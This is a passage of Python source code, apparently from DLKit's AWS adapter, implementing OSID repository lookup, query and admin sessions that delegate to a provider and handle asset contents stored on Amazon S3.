* plenary view: provides a complete result set or is an error
condition
* isolated repository view: All asset content methods in this session
operate, retrieve and pertain to asset contents defined explicitly in
the current repository. Using an isolated view is useful for
managing ``AssetContents`` with the ``AssetAdminSession.``
* federated repository view: All asset content methods in this session
operate, retrieve and pertain to all asset contents defined in this
repository and any other asset contents implicitly available in this
repository through repository inheritence.
The methods ``use_federated_repository_view()`` and
``use_isolated_repository_view()`` behave as a radio group and one
should be selected before invoking any lookup methods.
AssetContents may have an additional records indicated by their respective
record types. The record may not be accessed through a cast of the
``AssetContent``.
"""
def get_repository_id(self):
"""Gets the ``Repository`` ``Id`` associated with this session.
:return: the ``Repository Id`` associated with this session
:rtype: ``osid.id.Id``
*compliance: mandatory -- This method must be implemented.*
"""
return self._provider_session.get_repository_id()
repository_id = property(fget=get_repository_id)
def get_repository(self):
"""Gets the ``Repository`` associated with this session.
:return: the ``Repository`` associated with this session
:rtype: ``osid.repository.Repository``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return self._provider_session.get_repository()
repository = property(fget=get_repository)
def can_lookup_asset_contents(self):
"""Tests if this user can perform ``Asset`` lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations.
:return: ``false`` if lookup methods are not authorized, ``true`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def use_comparative_asset_content_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session.use_comparative_asset_content_view()
def use_plenary_asset_content_view(self):
"""A complete view of the ``Asset`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session._use_plenary_object_view()
def use_federated_repository_view(self):
"""Federates the view for methods in this session.
A federated view will include assets in repositories which are
children of this repository in the repository hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session._use_federated_catalog_view()
def use_isolated_repository_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this repository only.
*compliance: mandatory -- This method is must be implemented.*
"""
self._provider_session._use_isolated_catalog_view()
@utilities.arguments_not_none
def get_asset_content(self, asset_content_id):
"""Gets the ``AssetContent`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``AssetContent`` may have a different
``Id`` than requested, such as the case where a duplicate ``Id``
was assigned to an ``AssetContent`` and retained for compatibility.
:param asset_content_id: the ``Id`` of the ``AssetContent`` to retrieve
:type asset_content_id: ``osid.id.Id``
:return: the returned ``AssetContent``
:rtype: ``osid.repository.Asset``
:raise: ``NotFound`` -- no ``AssetContent`` found with the given ``Id``
:raise: ``NullArgument`` -- ``asset_content_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetContent(self._provider_session.get_asset_content(asset_content_id), self._config_map)
@utilities.arguments_not_none
def get_asset_contents_by_ids(self, asset_content_ids):
"""Gets an ``AssetList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the asset contents
specified in the ``Id`` list, in the order of the list,
including duplicates, or an error results if an ``Id`` in the
supplied list is not found or inaccessible. Otherwise,
inaccessible ``AssetContnts`` may be omitted from the list and may
present the elements in any order including returning a unique
set.
:param asset_content_ids: the list of ``Ids`` to retrieve
:type asset_content_ids: ``osid.id.IdList``
:return: the returned ``AssetContent list``
:rtype: ``osid.repository.AssetContentList``
:raise: ``NotFound`` -- an ``Id`` was not found
:raise: ``NullArgument`` -- ``asset_ids`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetContentList(self._provider_session.get_asset_contents_by_ids(asset_content_ids), self._config_map)
@utilities.arguments_not_none
def get_asset_contents_by_genus_type(self, asset_content_genus_type):
"""Gets an ``AssetContentList`` corresponding to the given asset content genus ``Type`` which does not include asset contents of types derived from the specified ``Type``.
In plenary mode, the returned list contains all known asset contents or
an error results. Otherwise, the returned list may contain only
those asset contents that are accessible through this session.
:param asset_content_genus_type: an asset content genus type
:type asset_content_genus_type: ``osid.type.Type``
:return: the returned ``AssetContent list``
:rtype: ``osid.repository.AssetContentList``
:raise: ``NullArgument`` -- ``asset_content_genus_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetContentList(self._provider_session.get_asset_contents_by_genus_type(asset_content_genus_type), self._config_map)
@utilities.arguments_not_none
def get_asset_contents_by_parent_genus_type(self, asset_content_genus_type):
"""Gets an ``AssetContentList`` corresponding to the given asset content genus ``Type`` and include any additional asset contents with genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known asset contents or
an error results. Otherwise, the returned list may contain only
those asset contents that are accessible through this session.
:param asset_content_genus_type: an asset content genus type
:type asset_content_genus_type: ``osid.type.Type``
:return: the returned ``AssetContent list``
:rtype: ``osid.repository.AssetContentList``
:raise: ``NullArgument`` -- ``asset_content_genus_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetContentList(self._provider_session.get_asset_contents_by_parent_genus_type(asset_content_genus_type), self._config_map)
@utilities.arguments_not_none
def get_asset_contents_by_record_type(self, asset_content_record_type):
"""Gets an ``AssetContentList`` containing the given asset record ``Type``.
In plenary mode, the returned list contains all known asset contents or
an error results. Otherwise, the returned list may contain only
those asset contents that are accessible through this session.
:param asset_content_record_type: an asset content record type
:type asset_content_record_type: ``osid.type.Type``
:return: the returned ``AssetContent list``
:rtype: ``osid.repository.AssetContentList``
:raise: ``NullArgument`` -- ``asset_content_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetContentList(self._provider_session.get_asset_contents_by_record_type(asset_content_record_type), self._config_map)
@utilities.arguments_not_none
def get_asset_contents_for_asset(self, asset_id):
"""Gets an ``AssetList`` from the given Asset.
In plenary mode, the returned list contains all known asset contents or
an error results. Otherwise, the returned list may contain only
those asset contents that are accessible through this session.
:param asset_id: an asset ``Id``
:type asset_id: ``osid.id.Id``
:return: the returned ``AssetContent list``
:rtype: ``osid.repository.AssetContentList``
:raise: ``NullArgument`` -- ``asset_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetContentList(self._provider_session.get_asset_contents_for_asset(asset_id), self._config_map)
@utilities.arguments_not_none
def get_asset_contents_by_genus_type_for_asset(self, asset_content_genus_type, asset_id):
"""Gets an ``AssetContentList`` from the given GenusType and Asset Id.
In plenary mode, the returned list contains all known asset contents or
an error results. Otherwise, the returned list may contain only
those asset contents that are accessible through this session.
:param asset_content_genus_type: an an asset content genus type
:type asset_id: ``osid.type.Type``
:param asset_id: an asset ``Id``
:type asset_id: ``osid.id.Id``
:return: the returned ``AssetContent list``
:rtype: ``osid.repository.AssetContentList``
:raise: ``NullArgument`` -- ``asset_content_genus_type`` or ``asset_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return AssetContentList(self._provider_session.get_asset_contents_by_genus_type_for_asset(asset_content_genus_type, asset_id), self._config_map)
class AssetQuerySession(abc_repository_sessions.AssetQuerySession,
osid_sessions.OsidSession):
"""This session provides methods for searching among ``Asset`` objects.
The search query is constructed using the ``AssetQuery``.
This session defines views that offer differing behaviors for
searching.
* federated repository view: searches include assets in
repositories of which this repository is a ancestor in the
repository hierarchy
* isolated repository view: searches are restricted to assets in
this repository
Assets may have a query record indicated by their respective record
types. The query record is accessed via the ``AssetQuery``.
"""
def get_repository_id(self):
"""Gets the ``Repository`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Repository Id`` associated with
this session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_repository_id()
repository_id = property(fget=get_repository_id)
def get_repository(self):
"""Gets the ``Repository`` associated with this session.
return: (osid.repository.Repository) - the ``Repository``
associated with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
return self._provider_session.get_repository()
repository = property(fget=get_repository)
def can_search_assets(self):
"""Tests if this user can perform ``Asset`` searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
return: (boolean) - ``false`` if search methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceQuerySession.can_search_resources_template
return self._provider_session.can_search_assets()
def use_federated_repository_view(self):
"""Federates the view for methods in this session.
A federated view will include assets in repositories which are
children of this repository in the repository hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._provider_session.use_federated_repository_view()
def use_isolated_repository_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this repository only.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._provider_session.use_isolated_repository_view()
def get_asset_query(self):
"""Gets an asset query.
return: (osid.repository.AssetQuery) - the asset query
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceQuerySession.get_resource_query_template
return self._provider_session.get_asset_query()
asset_query = property(fget=get_asset_query)
def get_assets_by_query(self, asset_query=None):
"""Gets a list of ``Assets`` matching the given asset query.
arg: asset_query (osid.repository.AssetQuery): the asset
query
return: (osid.repository.AssetList) - the returned ``AssetList``
raise: NullArgument - ``asset_query`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - the ``asset_query`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
return AssetList(self._provider_session.get_assets_by_query(asset_query),
self._config_map)
def get_asset_content_query(self):
"""Gets an asset content query.
return: (osid.repository.AssetContentQuery) - the asset content query
*compliance: mandatory -- This method must be implemented.*
"""
return self._provider_session.get_asset_content_query()
asset_content_query = property(fget=get_asset_content_query)
def get_asset_contents_by_query(self, asset_content_query=None):
"""Gets a list of ``AssetContents`` matching the given asset content query.
arg: asset_content_query (osid.repository.AssetContentQuery): the asset
content query
return: (osid.repository.AssetContentList) - the returned ``AssetContentList``
raise: NullArgument - ``asset_content_query`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - the ``asset_content_query`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
return AssetContentList(self._provider_session.get_asset_contents_by_query(asset_content_query),
self._config_map)
class AssetAdminSession(abc_repository_sessions.AssetAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Assets``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create an
``Asset,`` an ``AssetForm`` is requested using
``get_asset_form_for_create()`` specifying the desired record
``Types`` or none if no record ``Types`` are needed. The returned
``AssetyForm`` will indicate that it is to be used with a create
operation and can be used to examine metdata or validate data prior
to creation. Once the ``AssetForm`` is submiited to a create
operation, it cannot be reused with another create operation unless
the first operation was unsuccessful. Each ``AssetForm`` corresponds
to an attempted transaction.
For updates, ``AssetForms`` are requested to the ``Asset`` ``Id``
that is to be updated using ``getAssetFormForUpdate()``. Similarly,
the ``AssetForm`` has metadata about the data that can be updated
and it can perform validation before submitting the update. The
``AssetForm`` can only be used once for a successful update and
cannot be reused.
The delete operations delete ``Assets``. To unmap an ``Asset`` from
the current ``Repository,`` the ``AssetRepositoryAssignmentSession``
should be used. These delete operations attempt to remove the
``Bid`` itself thus removing it from all known ``Repository``
catalogs.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
The view of the administrative methods defined in this session is
determined by the provider. For an instance of this session where no
repository has been specified, it may not be parallel to the
``AssetLookupSession``. For example, a default
``AssetLookupSession`` may view the entire repository hierarchy
while the default ``AssetAdminSession`` uses an isolated
``Repository`` to create new ``Assets`` ora specific repository to
operate on a predetermined set of ``Assets``. Another scenario is a
federated provider who does not wish to permit administrative
operations for the federation unaware.
Example create:
if (!session.canCreateAssets()) {
return "asset creation not permitted";
}
Type types[1];
types[0] = assetPhotographType;
if (!session.canCreateAssetWithRecordTypes(types)) {
return "creating an asset with a photograph type is not supported";
}
AssetForm form = session.getAssetFormForCreate();
Metadata metadata = form.getDisplayNameMetadata();
if (metadata.isReadOnly()) {
return "cannot set display name";
}
form.setDisplayName("my photo");
PhotographRecordForm photoForm = (PhotographRecordForm)
form.getRecordForm(assetPhotogaphType);
Metadata metadata = form.getApertureMetadata();
if (metadata.isReadOnly()) {
return ("cannot set aperture");
}
photoForm.setAperture("5.6");
if (!form.isValid()) {
return form.getValidationMessage();
}
Asset newAsset = session.createAsset(form);
"""
def __init__(self, provider_session, config_map, lookup_session, proxy=None):
osid_sessions.OsidSession.__init__(self, provider_session, config_map, proxy)
self._asset_lookup_session = lookup_session
def get_repository_id(self):
"""Gets the ``Repository`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Repository Id`` associated with
this session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_repository_id()
repository_id = property(fget=get_repository_id)
def get_repository(self):
"""Gets the ``Repository`` associated with this session.
return: (osid.repository.Repository) - the ``Repository``
associated with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
return self._provider_session.get_repository()
repository = property(fget=get_repository)
def can_create_assets(self):
"""Tests if this user can create ``Assets``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known creating an ``Asset``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer create
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Asset`` creation is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_create_resources_template
return self._provider_session.can_create_assets()
def can_create_asset_with_record_types(self, asset_record_types=None):
"""Tests if this user can create a single ``Asset`` using the desired record types.
While ``RepositoryManager.getAssetRecordTypes()`` can be used to
examine which records are supported, this method tests which
record(s) are required for creating a specific ``Asset``.
Providing an empty array tests if an ``Asset`` can be created
with no records.
arg: asset_record_types (osid.type.Type[]): array of asset
record types
return: (boolean) - ``true`` if ``Asset`` creation using the
specified record ``Types`` is supported, ``false``
otherwise
raise: NullArgument - ``asset_record_types`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types_template
return self._provider_session.can_create_asset_with_record_types(asset_record_types)
def get_asset_form_for_create(self, asset_record_types=None):
"""Gets the asset form for creating new assets.
A new form should be requested for each create transaction.
arg: asset_record_types (osid.type.Type[]): array of asset
record types
return: (osid.repository.AssetForm) - the asset form
raise: NullArgument - ``asset_record_types`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form for requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceAdminSession.get_resource_form_for_create_template
return self._provider_session.get_asset_form_for_create(asset_record_types)
def create_asset(self, asset_form=None):
"""Creates a new ``Asset``.
arg: asset_form (osid.repository.AssetForm): the form for
this ``Asset``
return: (osid.repository.Asset) - the new ``Asset``
raise: IllegalState - ``asset_form`` already used in a create
transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``asset_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``asset_form`` did not originate from
``get_asset_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceAdminSession.create_resource_template
return self._provider_session.create_asset(asset_form)
def can_update_assets(self):
"""Tests if this user can update ``Assets``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating an ``Asset``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer update
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Asset`` modification is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_create_resources_template
return self._provider_session.can_update_assets()
def get_asset_form_for_update(self, asset_id=None):
"""Gets the asset form for updating an existing asset.
A new asset form should be requested for each update
transaction.
arg: asset_id (osid.id.Id): the ``Id`` of the ``Asset``
return: (osid.repository.AssetForm) - the asset form
raise: NotFound - ``asset_id`` is not found
raise: NullArgument - ``asset_id`` is null
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceAdminSession.get_resource_form_for_update_template
return self._provider_session.get_asset_form_for_update(asset_id)
def duplicate_asset(self, asset_id):
# Implemented from kitosid template for -
# osid.resource.ResourceAdminSession.get_resource_form_for_update
return self._provider_session.duplicate_asset(asset_id)
def update_asset(self, asset_form=None):
"""Updates an existing asset.
arg: asset_form (osid.repository.AssetForm): the form
containing the elements to be updated
raise: IllegalState - ``asset_form`` already used in anupdate
transaction
raise: InvalidArgument - the form contains an invalid value
raise: NullArgument - ``asset_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``asset_form`` did not originate from
``get_asset_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
return Asset(self._provider_session.update_asset(asset_form), self._config_map)
def can_delete_assets(self):
"""Tests if this user can delete ``Assets``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting an ``Asset``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer delete
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Asset`` deletion is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_create_resources_template
return self._provider_session.can_delete_assets()
def delete_asset(self, asset_id=None):
"""Deletes an ``Asset``.
arg: asset_id (osid.id.Id): the ``Id`` of the ``Asset`` to
remove
raise: NotFound - ``asset_id`` not found
raise: NullArgument - ``asset_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceAdminSession.delete_resource_template
# clean up AWS
asset = self._asset_lookup_session.get_asset(asset_id)
for ac in asset.asset_contents:
self.delete_asset_content(ac.ident)
self._provider_session.delete_asset(asset_id)
def can_manage_asset_aliases(self):
"""Tests if this user can manage ``Id`` aliases for ``Assets``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Asset`` aliasing is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
pass
def alias_asset(self, asset_id=None, alias_id=None):
"""Adds an ``Id`` to an ``Asset`` for the purpose of creating compatibility.
The primary ``Id`` of the ``Asset`` is determined by the
provider. The new ``Id`` performs as an alias to the primary
``Id``. If the alias is a pointer to another asset, it is
reassigned to the given asset ``Id``.
arg: asset_id (osid.id.Id): the ``Id`` of an ``Asset``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is already assigned
raise: NotFound - ``asset_id`` not found
raise: NullArgument - ``asset_id`` or ``alias_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
pass
def can_create_asset_content(self):
"""Tests if this user can create content for ``Assets``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known creating an
``AssetContent`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
create operations to an unauthorized user.
return: (boolean) - ``false`` if ``Asset`` content creation is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_create_resources_template
return self._provider_session.can_create_asset_content()
def can_create_asset_content_with_record_types(self, asset_content_record_types=None):
"""Tests if this user can create an ``AssetContent`` using the desired record types.
While ``RepositoryManager.getAssetContentRecordTypes()`` can be
used to test which records are supported, this method tests
which records are required for creating a specific
``AssetContent``. Providing an empty array tests if an
``AssetContent`` can be created with no records.
arg: asset_content_record_types (osid.type.Type[]): array of
asset content record types
return: (boolean) - ``true`` if ``AssetContent`` creation using
the specified ``Types`` is supported, ``false``
otherwise
raise: NullArgument - ``asset_content_record_types`` is
``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types_template
return self._provider_session.can_create_asset_content_with_record_types(
asset_content_record_types)
def get_asset_content_form_for_create(self,
asset_id=None,
asset_content_record_types=None):
"""Gets an asset content form for creating new assets.
arg: asset_id (osid.id.Id): the ``Id`` of an ``Asset``
arg: asset_content_record_types (osid.type.Type[]): array of
asset content record types
return: (osid.repository.AssetContentForm) - the asset content
form
raise: NotFound - ``asset_id`` is not found
raise: NullArgument - ``asset_id`` or
``asset_content_record_types`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form for requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
if AWS_ASSET_CONTENT_RECORD_TYPE in asset_content_record_types:
asset_content_record_types.remove(AWS_ASSET_CONTENT_RECORD_TYPE)
return AssetContentForm(
self._provider_session.get_asset_content_form_for_create(
asset_id,
asset_content_record_types),
self._config_map,
self.get_repository_id())
else:
return self._provider_session.get_asset_content_form_for_create(
asset_id,
asset_content_record_types)
def create_asset_content(self, asset_content_form=None):
"""Creates new ``AssetContent`` for a given asset.
arg: asset_content_form (osid.repository.AssetContentForm):
the form for this ``AssetContent``
return: (osid.repository.AssetContent) - the new
``AssetContent``
raise: IllegalState - ``asset_content_form`` already used in a
create transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``asset_content_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``asset_content_form`` did not originate
from ``get_asset_content_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
if isinstance(asset_content_form, AssetContentForm):
asset_content = self._provider_session.create_asset_content(
asset_content_form._payload)
else:
asset_content = self._provider_session.create_asset_content(
asset_content_form)
try:
if asset_content.has_url() and 'amazonaws.com' in asset_content.get_url():
return AssetContent(asset_content, self._config_map)
except TypeError:
pass
return asset_content
def can_update_asset_contents(self):
"""Tests if this user can update ``AssetContent``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating an
``AssetContent`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
update operations to an unauthorized user.
return: (boolean) - ``false`` if ``AssetContent`` modification
is not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_create_resources_template
return self._provider_session.can_update_asset_contents()
def get_asset_content_form_for_update(self, asset_content_id=None):
"""Gets the asset content form for updating an existing asset content.
A new asset content form should be requested for each update
transaction.
arg: asset_content_id (osid.id.Id): the ``Id`` of the
``AssetContent``
return: (osid.repository.AssetContentForm) - the asset content
form
raise: NotFound - ``asset_content_id`` is not found
raise: NullArgument - ``asset_content_id`` is ``null``
raise: OperationFailed - unable to complete request
*compliance: mandatory -- This method must be implemented.*
"""
asset_content_form = self._provider_session.get_asset_content_form_for_update(
asset_content_id)
if 'amazonaws.com' in asset_content_form.get_url_metadata().get_existing_string_values()[0]:
return AssetContentForm(asset_content_form,
self._config_map,
self.get_repository_id())
return asset_content_form
def update_asset_content(self, asset_content_form=None):
"""Updates an existing asset content.
arg: asset_content_form (osid.repository.AssetContentForm):
the form containing the elements to be updated
raise: IllegalState - ``asset_content_form`` already used in an
update transaction
raise: InvalidArgument - the form contains an invalid value
raise: NullArgument - ``asset_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``asset_content_form`` did not originate
from ``get_asset_content_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
if isinstance(asset_content_form, AssetContentForm):
asset_content = self._provider_session.update_asset_content(
asset_content_form._payload)
else:
asset_content = self._provider_session.update_asset_content(
asset_content_form)
if asset_content is not None and asset_content.has_url() and \
'amazonaws.com' in asset_content.get_url():
return AssetContent(asset_content, self._config_map)
return asset_content
def can_delete_asset_contents(self):
"""Tests if this user can delete ``AssetsContents``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting an
``AssetContent`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
delete operations to an unauthorized user.
return: (boolean) - ``false`` if ``AssetContent`` deletion is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_create_resources_template
return self._provider_session.can_delete_asset_contents()
def delete_asset_content(self, asset_content_id=None):
"""Deletes content from an ``Asset``.
arg: asset_content_id (osid.id.Id): the ``Id`` of the
``AssetContent``
raise: NotFound - ``asset_content_id`` is not found
raise: NullArgument - ``asset_content_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
asset_content = self._get_asset_content(asset_content_id)
if asset_content.has_url() and 'amazonaws.com' in asset_content.get_url():
# print "Still have to implement removing files from aws"
key = asset_content.get_url().split('amazonaws.com')[1]
remove_file(self._config_map, key)
self._provider_session.delete_asset_content(asset_content_id)
else:
self._provider_session.delete_asset_content(asset_content_id)
def _get_asset_id_with_enclosure(self, enclosure_id):
return self._provider_session._get_asset_id_with_enclosure(enclosure_id)
def _get_asset_content(self, asset_content_id):
"""stub"""
asset_content = None
for asset in self._asset_lookup_session.get_assets():
for content in asset.get_asset_contents():
if content.get_id() == asset_content_id:
asset_content = content
break
if asset_content is not None:
break
if asset_content is None:
raise NotFound('THe AWS Adapter could not find AssetContent ' +
str(asset_content_id))
return asset_content
class RepositoryLookupSession(abc_repository_sessions.RepositoryLookupSession,
osid_sessions.OsidSession):
"""This session provides methods for retrieving ``Repository`` objects.
The ``Repository`` represents a collection of ``Assets`` and
``Compositions``.
This session defines views that offer differing behaviors when
retrieving multiple objects.
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete set or is an error condition
Generally, the comparative view should be used for most applications
as it permits operation even if there is data that cannot be
accessed. For example, a browsing application may only need to
examine the ``Repositories`` it can access, without breaking
execution. However, an administrative application may require all
``Repository`` elements to be available.
Repositories may have an additional records indicated by their
respective record types. The record may not be accessed through a
cast of the ``Repository``.
"""
def __init__(self, provider_session, authz_session, proxy=None):
osid_sessions.OsidSession.__init__(self, provider_session, authz_session, proxy)
self._qualifier_id = Id('authorization.Qualifier%3AROOT%40dlkit.mit.edu')
# This needs to be done right
self._id_namespace = 'repository.Repository'
def can_lookup_repositories(self):
"""Tests if this user can perform ``Repository`` lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_lookup_resources_template
return self._provider_session.can_lookup_repositories()
def use_comparative_repository_view(self):
"""The returns from the lookup methods may omit or translate elements
based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.BinLookupSession.use_comparative_bin_view_template
self._provider_session.use_comparative_repository_view()
def use_plenary_repository_view(self):
"""A complete view of the ``Repository`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.BinLookupSession.use_plenary_bin_view_template
self._provider_session.use_plenary_repository_view()
def get_repository(self, repository_id=None):
"""Gets the ``Repository`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``Repository`` may have a
different ``Id`` than requested, such as the case where a
duplicate ``Id`` was assigned to a ``Repository`` and retained
for compatibility.
arg: repository_id (osid.id.Id): ``Id`` of the ``Repository``
return: (osid.repository.Repository) - the repository
raise: NotFound - ``repository_id`` not found
raise: NullArgument - ``repository_id`` is ``null``
raise: OperationFailed - unable to complete request
